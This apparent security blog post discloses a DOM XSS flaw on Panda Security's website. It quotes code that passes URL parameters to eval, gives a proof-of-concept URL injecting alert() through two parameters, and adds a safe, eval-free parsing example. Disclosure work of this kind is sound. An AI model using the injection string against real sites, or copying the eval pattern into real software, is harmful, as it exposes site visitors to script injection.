Thursday, January 10, 2013

Panda Security vulnerable to DOM XSS


Who is Panda?
Panda Security SL, formerly Panda Software, is a computer security company founded in 1990 by Panda's former CEO, Mikel Urizarbarrena, in the city of Bilbao, Spain. Initially centered on the production of antivirus software, the company has expanded its line of applications to include firewall applications, spam and spyware detection applications, cybercrime prevention technology, and other system management and security tools for businesses and home users.

Who uses it?
Panda Security is one of the largest antivirus vendors worldwide, which means lots of clients.

What seems to be the issue?
There is a DOM XSS vulnerability present on the pandasecurity.com website.

Affected file: aHref.js (eval + location.href)

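Vulnerable code:

    // Take everything after the "?" in the current page URL
    var Url = location.href;
    Url = Url.replace(/.*\?(.*?)/,"$1");
    Variables = Url.split ("&");
    for (i = 0; i < Variables.length; i++) {
        Separ = Variables[i].split("=");
        // Each name=value pair is concatenated into source text and passed to eval,
        // so a double quote in the value ends the string literal early
        eval ('var _'+Separ[0].toLowerCase()+'="'+Separ[1]+'"');
    }
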
Proof of concept:
http://www.pandasecurity.com/security-promotion/antivirusoffer/portugal/?track=109197";alert("xss by @dsopas");//&gclid=CO7Q3JmqzrQCFUpb3godzC4Ang";alert("xss by @dsopas");//

Both track and gclid are exploitable with this issue.
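
The same parameter extraction without eval, as an added example (not code from the original post and not Panda's actual fix): the query string is parsed as data, only expected names are kept, and values are checked against a strict format. The names parseTrackingParams, ALLOWED_PARAMS and SAFE_VALUE, the value policy and the example.test URLs are assumptions made for illustration.

```javascript
// Added example: read query parameters as data, never as code.
// parseTrackingParams, ALLOWED_PARAMS and SAFE_VALUE are hypothetical names.
const ALLOWED_PARAMS = new Set(["track", "gclid"]);

// Assumed policy: tracking values are short tokens of letters, digits, "_" and "-".
const SAFE_VALUE = /^[A-Za-z0-9_-]{1,128}$/;

function parseTrackingParams(href) {
  // No prototype, so names such as "__proto__" cannot touch Object.prototype.
  const result = Object.create(null);
  let query;
  try {
    query = new URL(href).searchParams; // handles splitting and percent-decoding
  } catch (e) {
    return result; // malformed URL: return nothing rather than guess
  }
  for (const [rawName, value] of query) {
    const name = rawName.toLowerCase(); // the original code lowercased names too
    if (!ALLOWED_PARAMS.has(name)) continue; // drop parameters nobody asked for
    if (!SAFE_VALUE.test(value)) continue;   // drop values with quotes, ";", "/" ...
    if (!(name in result)) result[name] = value; // first occurrence wins
  }
  return result;
}

// Constructed sample inputs (example.test is a placeholder host).
const benign =
  "https://example.test/offer/?Track=109197&gclid=CO7Q3JmqzrQCFUpb3godzC4Ang&x=1";
const hostile =
  'https://example.test/offer/?track=109197";alert(1);//&gclid=abc';

console.log(parseTrackingParams(benign));
console.log(parseTrackingParams(hostile));
```

In a page script the call would be parseTrackingParams(location.href), with the returned values read as properties instead of as generated `_track` / `_gclid` variables.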

Feedback?
PandaSecurity fixed this issue very fast. My congrats to their support.
